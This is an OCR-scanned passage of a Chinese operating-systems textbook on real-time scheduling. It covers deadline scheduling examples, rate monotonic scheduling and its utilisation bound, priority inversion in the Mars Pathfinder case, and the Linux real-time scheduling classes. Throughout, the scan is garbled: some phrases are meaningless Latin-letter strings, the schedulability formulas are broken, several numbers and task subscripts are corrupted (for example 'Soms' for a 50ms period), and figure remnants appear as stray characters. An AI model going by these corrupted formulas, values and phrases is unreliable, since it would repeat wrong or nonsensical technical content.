性 分 析 ; 如 果 执 行 , 它 是 静态 的 还 是 动态 的 ; 分 析 结 果 自 身 是 和 否 根 据 在 运行 时 分 派 的 任务 产生 一 
个 调度 或 计划 。 基 于 这 些 考 虑 ， 作 者 分 以 下 几 类 算法 进行 说 明 ， 
© BARE: MATT TASS SA TT. ARARE TRE, 它 用 于 确定 在 运行 
时 一 个 任务 何 时 必须 开始 执行 。 
@ 静态 优先 级 抢占 法 : 同样， 执行 一 个 静态 分 析 ， 但 是 没有 制定 调度 ， 而 且 用 于 给 任务 指 
定 优 先 级 ， 使 得 可 以 使 用 传统 的 基于 优先 级 的 抢占 式 调 度 器 。 
@ 基于 动态 规划 调度 法 : 在 运行 时 动态 地 确定 可 行 性 , 而 不 是 在 开始 运行 前 离线 地 确定 ( 静 
态 )。 一 个 到 达 的 任务 ， 只 有 当 能 够 满足 它 的 时 间 约 束 时 ， 才 可 以 被 接受 执行 。 可 行 性 分 
析 的 结果 是 一 个 调度 或 规划 ， 可 用 于 确定 何 时 分 派 这 个 任务 。 
@ 动态 尽力 调度 法 : SORT TE BEERE TE EAE, 并 终止 任何 已 经 
开始 运行 但 错过 最 后 期 限 的 进程 。 
静态 表 调 度 static table-driven scheduling ) 适用 于 周期 性 的 任务 。 该 分 析 的 输 和 人 为 周期 性 的 
到 达 时 间 、 执 行 时 间 、 周 期 性 的 最 后 结束 期 限 和 每 个 任务 的 相对 优先 级 。 调 度 器 试图 开发 一 种 调 
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度 , 使 得 能 够 满足 所 有 周期 性 任务 的 要 求 。 这 是 一 种 可 预测 的 方法 , 但 是 不 够 灵活 ， 因 为 任何 任 
务 要 求 的 任何 变化 都 需要 重 做 调度 。 最早 最 后 期 限 优先 或 其 他 周期 性 的 最 后 期 限 技术 (在 后 面 会 
HA) 都 属于 这 类 调度 算法 。 

静态 优先 级 抢占 调度 ( static priority-driven preemptive scheduling ) 与 大 多 数 非 实时 多 道 程序 
系统 中 的 基于 优先 级 的 抢占 式 调 度 所 用 的 机 制 相同 。 在 非 实时 系统 中 , 各 种 因素 都 可 能 用 于 确定 
优先 级 。 例如, 在 分 时 系统 中 , 进程 优先 级 的 变化 取决 于 它 是 处 理 器 密集 型 的 还 是 IO 密集 型 的 。 
在 实时 系统 中 , 优先 级 的 分 配 与 每 个 任务 的 时 间 约 束 相 关 。 这 种 方法 的 一 个 例子 是 速率 单调 算法 
(在 后 面 会 讲 到 )， 它 基于 周期 的 长 度 给 任务 指定 静态 优先 级 。 

基于 动态 规划 调度 (dynamic planning-based scheduling )， 在 一 个 任务 已 到 达 但 未 执行 时 ， 
试图 创建 一 个 包含 前 面 被 调度 任务 和 新 到 达 任 务 的 调度 。 如果 新 到 达 的 任务 可 以 按 这 种 方式 调 
E: 满足 它 的 最 后 期 限 ， 而且 被 调度 的 任务 也 不 会 错过 它 的 最 后 期 限 ， 则 修订 这 个 调度 以 适应 
新 任务 。 

动态 尽力 调度 (dynamic best effort scheduling) 是 当前 许多 商用 实时 系统 所 使 用 的 方法 。 当 
一 个 任务 到 达 时 , 该 系统 根据 任务 的 特性 给 它 指定 一 个 优先 级 , 并 通常 使 用 某 种 形式 的 时 限期 调 
E, 如 最 早 最 后 期 限 调度 。 典 型 情况 下 , 这 些 任 务 是 非 周 期 性 的 , 因此 不 可 能 进行 静态 调度 分 析 。 
而 对 于 这 类 调度 , 直到 到 达 最 后 期 限 或 者 直到 任务 完成 , 我 们 都 不 知道 是 否 满足 时 间 约 束 , 这 是 
这 类 调度 的 一 个 主要 缺点 ， 它 的 优点 是 易于 实现 。 


10.2.4 ”限期 调度 


大 多 数 当 代 实 时 操作 系统 的 设计 目标 是 尽 可 能 快速 地 启动 实时 任务 ,因此 强调 快速 中 断 处 理 
和 任务 分 派 。 事 实 上 , 在 评估 实时 操作 系统 时 ,并 没有 一 个 特别 有 用 的 度量 。 尽 管 存在 动态 资源 
请 求 和 冲突 、 处 理 过 载 和 软 硬 件 故障 ,实时 应 用 程序 通常 并 不 关注 绝对 速度 , 它 关注 的 是 在 最 有 
价值 的 时 间 完 成 (或 启动 ) 任务 , 既 不 要 太 早 ,也 不 要 太 晚 。 它 按照 优先 级 提供 的 天 然 工具 ,并 
不 捕获 在 最 有 价值 的 时 间 完 成 (或 启动 ) 的 需求 。 
近年 来 不 断 提出 了 许多 关于 实时 任务 调度 的 更 有 力 、 更 适合 的 方法 , 所 有 这 些 方法 都 基于 每 
个 任务 的 额外 信息 ， 最 常见 的 信息 有 : 
@ 就 绪 时 间 : 任务 开始 准备 执行 时 的 时 间 。 对 于 重复 的 或 周期 性 的 任务 ， 这 实际 上 是 一 个 
事先 知道 的 时 间 序 列 。 而 对 于 非 周期 性 的 任务 ， 或 者 也 事先 知道 这 个 时 间 ， 或 者 操作 系 
统 仅仅 知道 什么 时 候 任 务 真 正 就 绪 。 
© 启动 最 后 期 限 : 任务 必须 开始 的 时 间 。 . 
© 完成 最 后 期 限 : 任务 必须 完成 的 时 间 。 典 型 的 实时 应 用 程序 或 者 有 启动 最 后 期 限 ， 或 者 
有 完成 最 后 期 限 ， 但 不 会 两 者 都 存在 。 
e 处 理 时 间 : 从 执行 任务 直到 完成 任务 所 需要 的 时 间 。 在 某 些 情况 下 ,可 以 提供 这 个 时 间 ， 
而 在 另外 一 些 情 况 下 ， 操 作 系 统 度量 指数 平均 值 。 其 他 调度 系统 没有 使 用 这 个 信息 。 
@ 资源 需求 : 任务 在 执行 过 程 中 所 需要 的 资源 集合 (处理 器 以 外 的 资源 )。 
@ 优先 级 : 度量 任务 的 相对 重要 性 。 硬 实时 任务 可 能 具有 绝对 的 优先 级 ， 如 果 错 过 最 后 期 
限 会 导致 系统 失败 。 如 果 系 统 无 论 如 何 也 要 继续 运行 ， 则 硬 实时 任务 和 软 实时 任务 可 以 
被 指定 相关 的 优先 级 ， 以 指导 调度 器 。 
@ 子 任务 结构 : 一 个 任务 可 以 分 解 成 一 个 必须 执行 的 子 任务 和 一 个 可 选 的 子 任务 。 只 有 必 
须 执 行 的 子 任务 拥有 硬 最 后 期 限 。 
当 考 虑 到 最 后 期 限时 , 实时 调度 功能 可 以 分 成 许多 维 : 下 一 次 调度 哪个 任务 以 及 允许 哪 种 类 
型 的 抢占 。 可 以 看 到 ,对 一 个 给 定 的 抢占 策略 ,其 具有 启动 最 后 期 限 或 者 完成 最 后 期 限 , 采用 最 
早 最 后 期 限 优先 的 策略 调度 ， 任 务 可 以 使 超过 最 后 期 限 的 任务 数 最 少 [ BUTT99, HONG89, 
PANW88 ]。 这 个 结论 既 适 用 于 单 处 理 器 配置 ， 又 适用 于 多 处 理 器 配置 。 
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男 一 个 重要 的 设计 间 题 是 抢占 。 当 确定 了 启动 最 后 期 限 后 , 就 可 以 使 用 非 抢 占 式 调度 器 。 在 
这 种 情况 下 ， 当 实时 任务 完成 了 必须 执行 的 部 分 或 者 关键 部 分 , 它 自己 负责 阻塞 自己 , 使 得 别 的 
实时 启动 最 后 期 限 能 够 得 到 满足 ， 这 符合 图 10.5b 中 的 模式 。 对 于 具有 完成 最 后 期 限 的 系统 ， 抢 
占 策略 是 最 适合 的 ， 如 图 10.5c 和 图 10.5d 所 示 。 例如， 如 果 任 务 X 正 在 运行 ,任务 立 就 绪 ， 能 
够 使 X 和 YY 都 满足 它们 的 完成 最 后 期 限 的 唯一 方法 可 能 是 抢占 X BAY 直到 完成 ， 然 后 恢复 
X， 并 运行 到 完成 。 : 


Animation: Periodic with Completion Deadline 

下 面 给 出 一 个 具有 完成 最 后 期 限 的 周期 性 任务 调度 的 例子 。 考虑 一 个 系统 , 从 两 个 传感器 A 

MB 中 收集 并 处 理 数据 。 传 感 器 A 每 20ms 收集 一 次 数据 ，B 每 50ms 收集 一 次 。 处 理 每 个 来 自 

A 的 数据 样本 需要 10ms, 处 理 每 个 来 自 B 的 数据 样本 需要 25ms( 包括 操作 系统 的 开销 )。 表 10.2 

概括 了 这 两 个 任务 的 执行 简 表 。 图 10.6 使 用 表 10.2 的 执行 简 表 比较 了 三 种 调度 技术 。 图 10.6 的 
第 一 行 重复 了 表 10.2 的 信息 ; 剩 下 的 三 行 举例 说 明了 这 三 种 调度 技术 。 


表 10.2 两 个 周期 性 任务 的 执行 简 表 





进 程 到 达 时 间 执行 时 间 结束 最 后 期 限 
A(1) 0 10 20 
A(2) 20 10 40 
A (3) 40 10 60 
A (4) 60 10 80 


A (5) 80 10 100 


B(1) 0 25 50 
B(2) 50 25 100 





计算 机 能 够 每 隔 10ms° 进行 一 次 调度 决策 。 假 设 在 这 些 情 况 下 ， 我 们 试图 使 用 一 个 优先 级 
调度 方案 ， 图 10.6 中 的 前 两 个 时 序 图 显示 了 调度 结果 。 如 果 A 具有 更 高 的 优先 级 ， 则 在 它 的 最 
后 期 限 到 来 前 , 仅仅 给 任务 B 的 第 一 个 实例 20ms 的 处 理 时 间 ( 两 个 10ms 的 时 间 块 ), 然后 失败 。 
如 果 B 具有 更 高 的 优先 级 ， 则 A 将 会 错过 它 的 第 一 个 最 后 期 限 。 最 后 一 个 时 序 图 显示 了 使 用 最 
里 最 后 期 限 调度 的 结果 。 在 时 刻 Hoke, Al 和 B 同时 到 达 。 由 于 Al 的 最 后 期 限 比 Bl 的 早 ， 
因此 它 首 先 被 调度 。 当 Al 完成 时 ，B1 被 分 配给 处 理 器 。 当 (=20 时 ，A2 到 达 ， 由 于 A2 的 最 后 
期 限 比 Bl 的 早 ，B1 被 中 断 ， 使 得 A2 可 以 运行 到 完成 。 当 六 30 时 ，B1 被 唤醒 。 当 六 40 时 ， 
A3 到 达 。 但 此 时 Bl 的 最 后 完成 期 限 比 A3 的 早 ， 因 此 允许 它 继续 执行 直到 在 H45 时 完成 。 然 
后 A3 被 分 配给 处 理 器 ， 并 在 二 55 时 完成 。 2 


Animation: Aperiodic with Starting Deadline 


在 这 个 例子 中 , 通过 在 每 个 可 抢占 点 上 优先 调度 最 后 期 限 最 邻近 的 进程 , 可 以 满足 系统 的 所 
有 要 求 。 由 于 任务 是 周期 性 的 和 可 预测 的 ， 因 此 可 以 使 用 静态 表 调 度 方法 。 

现在 考虑 处 理 具 有 启动 最 后 期 限 的 非 周期 性 任务 的 方案 。 图 10.7 给 出 了 这 样 的 一 个 例子 ， 
它 由 5 个 任务 组 成 ， 每 个 任务 的 执行 时 间 为 20ms， 图 中 最 上 面 的 部 分 给 出 了 这 5 个 任务 各 自 的 
到 达 时 间 和 启动 最 后 期 限 。 表 10.3 给 出 了 它们 的 执行 简 表 。 


© 10ms 并 非 调度 间隔 的 上 限 。 
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fal. 


BAN 


le RFC ABE 

A 有 优先 权 
固定 优先 级 调度 

B 有 优先 权 
使 用 完成 最 后 期 限 的 
最 早 最 后 期 限 调度 


10.6 ”有 完成 最 后 期 限 的 周期 性 实时 任务 的 调度 ( 基于 表 10.2 ) 


最 后 期 限 


到 达 时 间 
动 


A 


最 早 最 


服务 


后 期 限 


g 
R 
ie 
T 
R 
让 





启动 最 后 期 限 


图 10.7 有 启动 最 后 期 限 的 非 周 期 性 实时 任务 的 调度 
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R103 5 个 非 周期 性 任务 的 执行 简 表 





进 g 到 达 时 间 执行 时 间 启动 最 后 期 限 
A 10 20 110 
B 20 20 20 
C 40 20 50 
D 50 20 90 
E 60 20 70 





一 个 最 直接 的 方案 是 永远 调度 具有 最 早 最 后 期 限 的 就 绪 任 务 ， 并 让 该 任务 一 直 运 行 到 完成 。 
当 该 方法 用 于 图 10.7 中 的 例子 时 ， 可 以 看 到 尽管 任务 B 需要 立即 服务 ， 但 服务 被 拒绝 。 这 在 处 
理 非 周期 性 任务 , 特别 是 有 启动 最 后 期 限 的 非 同期 性 任务 时 是 很 危险 的 。 如 果 在 任务 就 绪 前 事先 
知道 最 后 期 限 , 则 可 以 对 该 策略 进行 改进 以 提高 性 能 。 这 种 策略 称 做 有 自愿 空闲 时 间 的 最 早 最 后 
期 限 , 具体 操作 如 下 : 总 是 调度 最 后 期 限 最 早 的 合格 任务 ,并 让 该 任务 运行 直到 完成 。 一 个 合 
任务 可 以 是 还 没有 就 绪 的 任务 , 这 就 可 能 导致 即使 有 就 绪 任 务 , 处 理 器 仍 保持 空闲 。 注意 , 在 上 
面 的 例子 中 ， 尽 管 A 是 唯一 的 就 绪 任 务 ， 但 系统 仍然 忍 住 不 调度 它 ， 其 结果 是 ， 尽 管 处 理 器 的 
利用 率 并 不 是 最 高 的 , 但 是 可 以 满足 所 有 的 调度 要 求 。 最 后 , 为 了 比较 ,图 中 还 给 出 了 FCFS R 
略 ， 在 这 种 情况 下 ,任务 B 和 任务 EE 的 最 后 期 限 都 不 能 得 到 满足 。 
z 


1 0.2.5 速 率 单调 调 度 Animation: Rate Monotonic Scheduling 


为 周期 性 任务 解决 多 任务 调度 冲突 的 一 个 非常 好 的 方法 是 速率 单调 调度 (Rate Monotonic 
Scheduling, RMS )。 这 个 方案 最 早 是 由 [LIU73 | 提出 的 ,但 是 在 最 近 才 得 到 普及 [ BRIA99， 
SHA94 ]。RMS 基于 任务 的 周期 给 它们 指定 优先 级 。 高 





在 RMS 中 ,最短 周 期 的 任务 具有 最 高 优先 级 , 次 短 T RT Nw 
周期 的 任务 具有 次 高 优先 级 , 以 此 类 推 。 当 同时 有 多 个 任 F 
务 可 以 被 执行 时 ,最 短 周期 的 任务 被 优先 执行 。 如 果 将 任 。 L a 
务 的 优先 级 看 做 速率 的 函数 ,那么 这 就 是 一 个 单调 递增 的 站 Ue 
函数 (如 图 10.8 所 示 ),“ 速 率 单调 调度 ”因此 而 得 名 。 _ 

图 10.9 说 明了 周期 性 任务 的 相关 参数 。 任 务 周期 -示人 
T， 指 从 该 任务 的 一 个 实例 到 达到 下 一 个 实例 到 达 之 间 
的 时 间 总 量 。 任 务 速率 ( 单位 为 Hz ) WE CA f BE 





位 为 s) 的 倒数 。 例 如 ， 如 果 一 个 任务 的 周期 为 Soms， 图 10.8 RMS 下 的 任务 集 [ WARR91 ] 
则 它 以 20Hz 的 速率 发 生 。 典 型 情况 下 ， 任 务 周期 的 末 

端 也 是 该 任务 的 硬 最 后 期 限 ， 尽 管 一 些 任务 可 能 有 更 早 的 最 后 期 限 。 执 行 时 间 (或 计算 时 间 ) C 
是 每 个 发 生 的 任务 所 需要 的 处 理 时 间 总 量 。 显 然 , 在 一 个 单 处 理 器 系统 中 , 执行 时 间 必 须 不 大 于 
它 的 周期 ( 必须 保证 C<7T)。 如 果 一 个 周期 性 任务 总 是 运行 到 完成 ,也 就 是 说 , 该 任务 的 任何 一 
个 实例 都 不 曾 因为 资源 缺乏 而 被 拒绝 服务 , 则 该 任务 的 处 理 器 利用 率 为 U=C/T。 例如 ， 如 果 一 个 
任务 的 周期 为 80ms， 执 行 时 间 为 55ms， 则 它 的 处 理 器 利用 率 为 55/80=0.6875。 


二 一 一 一 一 一 周期 1 一 一 一 一 一 一 一 一 一 膨 期 2 一 一 一 一 一 一 > 





十 一 
任务 P， 执 行 时 间 C 
所 一 一 一 一 一 任务 P， 周 期 7 了 一 一 一 一 一 > 


图 10.9 ”周期 性 任务 的 时 序 图 
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衡量 周期 调度 算法 有 效 人 性 的 一 种 度量 是 看 它 是 否 能 保证 满足 所 有 硬 最 后 期 限 。 假 设 有 7 ME 
务 , 每 个 任务 都 有 一 固定 的 周期 和 执行 时 间 , 为 了 满足 所 有 的 最 后 期 限 ， 必 须 保 持 下 面 的 不 等 式 
成 立 : 
CC . C2 Ch 


a e 41 . 
nin +E S (10.1) 


单个 任务 的 处 理 器 利用 率 的 总 和 不 能 超过 1，1 对 应 于 处 理 器 的 总 利用 率 。 公 式 (10.1) 提供 了 
关于 任务 数目 的 一 个 界限 , 使 得 正确 的 调度 算法 能 够 成 功 地 调度 。 对 任何 特定 的 算法 , 这 个 界限 
可 能 会 很 低 。 对 RMS， 下 面 的 不 等 式 成 立 : 

CC 
ni R 


R 10.4 给 出 了 这 个 上 界 的 一 些 值 。 当 任务 数目 增加 时 ， 调 度 上 界 收敛 于 In2~0.693。 





上 1) ( 10.2) 


表 10.4 RMS 上 界 值 





n n (2'"-1) 
1 1.0 

2 0.828 

3 0.779 

4 0.756 

5 0.743 

6 0.734 

op In 2~ 0.693 


举 一 个 例子 ， 考 虑 下面 三 个 周期 任务 ,其 中 UEC T: 
@ 任务 Pl: CI 一 20; 7,=100; U,=0.2 
@ 任务 P;: C2=40; 了 一 150; U,=0.267 
@ 任务 P;: C3=100; T;=—350; 一 0.286 
这 三 个 任务 的 总 利用 率 为 0.2+0.267+0.286=0.753。 使 用 RMS， 这 三 个 任务 的 可 调度 性 上 界 为 


iG <3(2'? —1)=0.779 
2 B 


由 于 这 三 个 任务 的 总 利用 率 小 于 RMS 的 上 界 ( 0.753<0.779 )， 因 此 可 以 知道 ， 如 果 使 用 RMS, 
则 所 有 的 任务 可 以 得 到 成 功 的 调度 。 
可 以 看 出 ,公式 (10.1) 中 的 上 界 对 最 早 最 后 期 限 调度 也 成 立 。 因 此 ， 有 可 能 可 以 达到 更 大 
的 处 理 器 利用 率 ， 最 早 最 后 期 限 调度 可 以 适用 于 更 多 的 周期 性 任务 。 然 而 ，RMS 已 经 被 广泛 使 
用 于 工业 应 用 中 。[ SHA91 ] 对 此 给 出 了 如 下 解释 : 
1) 实践 中 的 性 能 差别 很 小 。 公 式 (10.2) 的 上 界 是 一 个 比较 保守 的 值 ， 实 际 上 ,利用 率 常 
常 能 达到 90%。 
2) 大 多 数 硬 实时 系统 也 有 软 实时 部 件 ， 如 某 些 非 关 键 性 的 显示 和 内 置 的 自 测试 ， 它 们 可 以 
在 低 优 先 级 上 执行 ， 占 用 硬 实时 任务 的 RMS 调度 中 没有 使 用 的 处 理 器 时 间 。 
3) RMS 易于 实现 稳定 性 。 当 一 个 系统 由 于 超载 和 瞬时 错误 不 能 满足 所 有 的 最 后 期 限时 ， 对 
一 些 基 本 任务 ， 只 要 它们 是 可 调度 的 ， 它 们 的 最 后 期 限 就 应 该 得 到 保证 。 在 静态 优先 级 
分 配方 法 中 ， 只 需要 确保 基本 任务 具有 相对 比较 高 的 优先 级 。 在 RMS 中 ， 这 可 以 通过 
让 基本 任务 具有 较 短 的 周期 ， 或 者 通过 修改 RMS 优先 级 以 说 明基 本 任务 来 实现 。 对 于 
最 早 最 后 期 限 调度 ， 周 期 性 任务 的 优先 级 从 一 个 周期 到 另 一 个 周期 是 不 断 变 化 的 ， 这 使 
得 基本 任务 的 最 后 期 限 很 难得 到 满足 。 


#10 Ë SARR PRHA 321 





10.26 ”优先 级 反 转 


优先 级 反 转 ( priority inversion ) 是 在 任何 基于 优先 级 的 可 抢占 的 调度 方案 中 都 能 发 生 的 一 
种 现象 , 它 与 实时 调度 的 上 下 文 关联 很 大 。 最 有 名 的 优先 级 反 转 的 例子 当 属 火星 探 路 者 任务 。 漫 
游 者 机 器 人 在 1997 年 7 月 4 日 登陆 火星 ， 然 后 开始 收集 并 向 地 球 传 回 大 量 的 数据 。 但 是 ,任务 
进行 了 几 天 以 后 , 着 陆 舱 的 软件 开始 产生 了 整个 系统 的 重启 ,导致 了 数据 的 丢失 。 在 制造 了 火星 
探 路 者 的 喷气 推进 实验 室 的 不 懈 努 力 下 ， 发 现 问题 出 在 优先 级 反 转 上 [JONE97]。 

在 任何 优先 级 调度 方案 中 , 系统 应 该 不 停 地 执行 具有 最 高 优先 级 的 任务 。 当 系统 内 的 环境 迫 
使 一 个 较 高 优先 级 的 任务 去 等 待 一 个 较 低 优先 级 的 任务 时 , 优先 级 反 转 就 会 发 生 。 一 个 简单 的 例 
子 是 ， 当 一 个 低 优先 级 的 任务 被 某 个 资源 ( 如 设备 或 者 信号 量 ) 所 阻塞 ,并 且 一 个 高 优先 级 的 任 
务 也 要 被 同一 个 资源 阻塞 的 时 候 ， 优 先 级 反 转 就 会 发 生 。 高 优先 级 的 任务 将 会 被 置 为 阻塞 状态 ， 
直到 能 够 得 到 需要 的 资源 。 如 果 低 优先 级 的 任务 迅速 使 用 完 资 源 并 且 释 放 掉 , 高 优先 级 的 任务 可 
能 很 快 被 唤醒 ， 并 在 实时 限制 内 完成 。 

一 个 更 加 严重 的 情况 被 称 为 无 界限 优先 级 反 转 ( unbounded priority inversion ), 在 这 种 情况 下 ， 
优先 级 反 转 的 持续 时 间 不 仅 依赖 于 处 理 共享 资源 的 时 间 ， 还 依赖 于 其 他 不 相关 任务 的 不 可 预测 的 
行为 。 在 探 路 者 软件 中 出 现 的 优先 级 反 转 是 无 界限 的 ， 并 且 是 这 种 现象 的 一 个 很 好 的 例子 。 下 面 
的 讨论 将 依据 [TIME02]。 探 路 者 软件 包含 下 面 三 个 任务 ， 按 优先 级 递减 的 顺序 排列 : 

T: 周期 性 地 检查 太空 船 和 软件 的 状况 。 

Ta: 处 理 图 片 数 据 。 

T: 随机 检测 设备 的 状态 。 

在 Ti 执行 完 后 ,将 计时 器 重新 初始 化 为 最 大 值 。 如 果 计 时 器 计时 完毕 ， 那 么 就 认为 整个 着 陆 
舱 的 软件 被 不 知名 的 原因 所 终止 ， 处 理 器 将 会 终止 ， 所 有 的 服务 都 会 重启 ， 软 件 完 全 重新 装载 ， 太 
空 船 系统 被 检测 ， 整 个 系统 重新 开始 。 整 个 回复 过 程 需 要 一 天 的 时 间 。T, 和 T: 共享 了 一 个 通用 的 
数据 结构 ， 这 个 数据 结构 被 -一 个 二 元 的 信号 量 s 保护 。 图 10.10a 显示 了 导致 优先 级 反 转 的 顺序 : 

ti: Ts 开始 执行 。 

th: Ts 锁 住 了 信号 量 s 并 且 进 入 了 临界 区 。 

t: Ti， 比 Ts 有 更 高 的 优先 级 ， 抢占 T; 并 且 开 始 执行 。 

ty; Ti 准备 进入 临界 区 但 是 被 阻塞 ， 因 为 信号 量 被 T; 锁 住 ; Ts 重新 在 自己 的 临界 区 中 执行 。 

ts: TLK Ts 有 更 高 的 优先 级 ，T2 抢占 T 并 开始 执行 。 

te: Ts 由 于 某 种 与 Ti 和 Ts: 不 相关 的 原因 而 被 挂 起 ，T; 接着 执行 。 

ty: Ts 离开 了 临界 区 并 且 将 信号 量 解锁 ，Ti 抢占 T;，Ti 锁 住 信号 量 ， 进 入 自己 的 临界 区 。 
在 这 一 系列 的 环境 中 ，Ti 必须 等 待 T: AT, 完成 ， 并 且 在 T; 运行 完毕 之 前 不 能 重 置 计 时 器 。 

在 实际 的 系统 中 , 用 到 了 两 个 可 代替 的 方法 避免 无 界限 的 优先 级 反 转 : 优先 级 继承 priority 
inheritance ) 和 优先 级 置顶 (priority ceiling )。 

优先 级 继承 的 基本 思想 是 优先 级 较 低 的 任务 继承 任何 与 它 共 享 同 一 个 资源 的 优先 级 较 高 的 
任务 的 优先 级 。 当 高 优先 级 的 任务 在 资源 上 阻塞 的 时 候 , 优先 级 立即 更 改 。 当 资源 被 低 优先 级 的 
任务 释放 时 这 个 改变 结束 。 图 10.10b 显示 了 解决 图 10.10a 提出 的 无 界限 的 优先 级 反 转 的 问题 ， 
相关 的 事件 顺序 如 下 : 

ti: Ts 开始 执行 。 

t2: Ts 锁 住 信号 量 S 并 且 进 入 临界 区 。 

ts: T, RERE Ts 高， 抢占 Ts 并 开始 执行 。 

ty: Ti 准备 进 和 人 临界 区 但 是 被 阻塞 ， 因 为 信号 量 被 ILE, T 立即 被 临时 赋予 与 T 相同 的 
优先 级 ，T, 重新 在 自己 的 临界 区 中 执行 。 

ts: T; 淮 备 执行 但 是 由 于 现在 T 有 更 高 的 优先 级 ，T2 不 能 抢占 Ti。 
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te: Ts 离开 了 临界 区 并 释放 信号 量 : 它 的 优先 级 降 回 到 之 前 的 默认 值 。 然 后 Ti 抢占 Ts, K 
得 信号 量 ， 进 入 临界 区 。 
t: Ti 由 于 某 种 与 Ts 不 相关 的 原因 而 被 挂 起 ，T; 开始 执行 。 
这 就 是 探 路 者 问题 的 解决 方法 。 
在 优先 级 顶 置 方案 中 , 优先 级 与 每 个 资源 相关 联 , 资源 的 优先 级 被 设 定 为 比 使 用 该 资源 的 具 
有 最 高 优先 级 的 用 户 的 优先 级 要 高 一 级 .调度 器 然后 动态 地 将 这 个 优先 级 分 配给 任何 访问 该 资源 
的 任务 。 一 且 任 务 使 用 完 资 源 ， 优 先 级 返回 到 以 前 的 值 。 


被 Ti 阻塞 





被 
(试图 锁 住 s) s BE 被 了 阻塞 
| | ott 5) E sae 
= L I/ 
Ti Ti 
-TEFS __ 
T T_ M 
: 5 被 we Tite ;解锁 
1 
J | Ts BATE | 
r 四 
t bb ub 时 间 te tr te eT ee u ty ty 由 
a) 无 界限 的 优先 级 反 转 b) 优先 级 继承 的 用 途 


Brent EJ 在 临界 区 中 执行 
图 10.10 ”优先 级 反 转 


10.3 Linux 调度 


对 Linux 2.4 以 及 更 早 的 版 本 ，Linux 提供 了 实时 的 调度 器 ， 这 个 调度 器 与 一 个 非 实 时 的 进 
程 调度 器 耦合 在 一 起 ,而 这 个 调度 器 使 用 的 是 9.3 节 描 述 的 传统 的 UNIX 调度 算法 。Linux 2.6 包 
含 了 与 以 前 的 版 本 相同 的 实时 调度 器 , 并 且 在 本 质 上 对 非 实时 的 调度 器 进行 了 修改 , 下 面 将 分 别 
介绍 这 两 方面 。 


10.3.1 实时 调度 


负责 Linux 调度 的 三 个 类 是 : 
@ SCHED FIFO: 先进 先 出 实时 线程 
@ SCHED RR: 轮转 实时 线程 
@ SCHED OTHER: 其 他 非 实 时 线程 
每 个 类 都 使 用 了 多 优先 级 ,实时 类 的 优先 级 高 于 SCHED_OTHER 类 .默认 的 设置 是 这 样 的 : 
实时 优先 级 类 的 优先 级 范围 是 0 ~ 99 ( 包含 99), SCHED_OTHER 类 的 范围 是 100 ~ 139。 较 小 
的 数字 代表 较 高 的 优先 级 。 
对 FIFO 类 ， 有 以 下 规则 : 
1) 除非 在 以 下 情况 ， 系 统 不 会 中 断 一 个 正在 执行 的 FIFO RE: 
a) 另 一 个 具有 更 高 优先 级 的 FIFO 线程 就 绪 。 
b) 正在 执行 的 FIFO 线程 因为 等 待 一 个 事件 (如 WO ) 而 被 阻塞 。 
c) 正在 执行 的 FIFO 线程 通过 调用 sched yield 原 语 自愿 放弃 处 理 器 。 
2 ) 当 一 个 FIFO 线程 被 中 断后 ， 它 被 放置 在 一 个 与 其 优先 级 相关 联 的 队列 中 。 
3) 当 一 个 FIFO 线程 就 绪 ， 并 且 如 果 该 线程 比 当前 正在 执行 的 线程 具有 更 高 的 优先 级 时 ， 
当前 正在 执行 的 线程 被 抢占 ， 具 有 最 高 优先 级 且 就 绪 的 FIFO 线程 开始 执行 。 如 果 有 多 
个 线程 都 具有 最 高 优先 级 ， 则 选择 等 待 时 间 最 长 的 线程 。 
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SCHED_RR 策略 与 SCHED_FIFO 策略 类 似 ， 只 是 在 SCHED RR 策略 下 ,每 个 线程 者 有 一 个 
时 间 量 与 之 关联 。 当 一 个 SCHED_RR 线程 在 它 的 时 间 量 里 执行 结束 后 ， TEHE, REWER 
选择 一 个 具有 相同 或 更 高 优先 级 的 实时 线程 运行 。 

图 10.11 中 的 例子 说 明了 FIFO 和 RR 调度 的 区 别 。 假 设 一 个 程序 有 4 个 线程 ， 共 有 三 种 优 
先 级 ， 优 先 级 分 配 情 况 如 图 10.11a 所 示 。 假 设 在 当前 线程 等 待 或 终止 时 ， 所 有 等 待 线程 都 准备 
执行 ， 并 且 假 设 当 一 个 线程 正在 执行 时 ， 没 有 更 高 优先 级 的 线程 被 唤醒 。 图 10.11b 显示 了 
SCHED_FIFO 类 中 的 所 有 线程 流 。 线 程 D 执行 直到 它 等 待 或 终止 ， 接 着 ， 尽 管线 程 B 和 口上 共有 
相同 的 优先 级 ,但 是 由 于 线程 .B 等 待 的 时 间 比 线程 C 长 ， 因 此 线程 B 开始 执行 。 线 程 B 执行 直 
到 它 等 待 或 终止 ， 然 后 线程 C 执行 直到 它 等 待 或 终止 。 最 后 ， 线 程 A 执行 。 

图 10.11c 显示 了 所 有 线程 都 在 ScHED_RR 类 中 时 的 线程 流 。 线 程 D 执行 直到 它 等 待 或 终止 ， 
接 下 来 由 于 线程 B 和 线程 C 具有 相同 的 优先 级 ， 它 们 按时 间 片 执行 。 最 后 执行 线程 A。 

最 后 一 种 调度 类 是 SCHED_oTHER。 只 有 当 没 有 实时 线程 运行 就 绪 时 ， 才 可 以 执行 这 个 类 中 
的 线程 。 





D—>B—>C—A——> D> BC BCA 
a) 线程 相对 优先 级 b) FIFO 调度 的 线程 流 c) RR 调度 的 线程 流 


图 10.11 关于 Linux 实时 调度 的 例子 


10.3.2 JERE 


Linux 2.4 基于 SCHED _OTHER 策略 的 调度 程序 随 着 中 央 处 理 器 及 程序 数目 的 增加 表现 得 并 
不 好 。 这 种 调度 程序 的 缺点 如 下 : 
@ Linux 2.4 调度 程序 在 对 称 多 处 理 器 系统 (SMP) 中 ， 对 所 有 中 央 处 理 器 仅 使 用 一 个 运行 
队列 。 这 就 意味 着 一 个 任务 可 以 调度 到 任何 一 个 处 理 器 上 运行 ， 这 对 负载 均衡 有 好 处 ， 
但 却 不 利于 高 速 缓存 。 例 如 ,一 个 任务 在 CPU-1 上 执行 , 且 该 任务 的 数据 在 CPU-1 的 高 
速 缓存 中 。 如 果 该 任务 接 下 来 被 CPU-2 调度 , 那么 CPU-1 的 高 速 缓存 中 的 数据 不 得 不 作 
KR, 任务 数据 需要 重新 加 载 到 CPU-2 中 。 E 
@ Linux 2.4 调度 程序 使 用 一 个 运行 队列 锁 。 因 此 , 在 SMP 系统 中 , 一 个 处 理 器 选择 任务 执 
行 的 动作 将 阻止 所 有 其 他 处 理 器 从 这 个 队列 中 调度 任务 ， 其 结果 就 是 空闲 处 理 器 不 得 不 
等 待 运行 队列 被 解锁 ， 降 低 了 工作 效率 。 
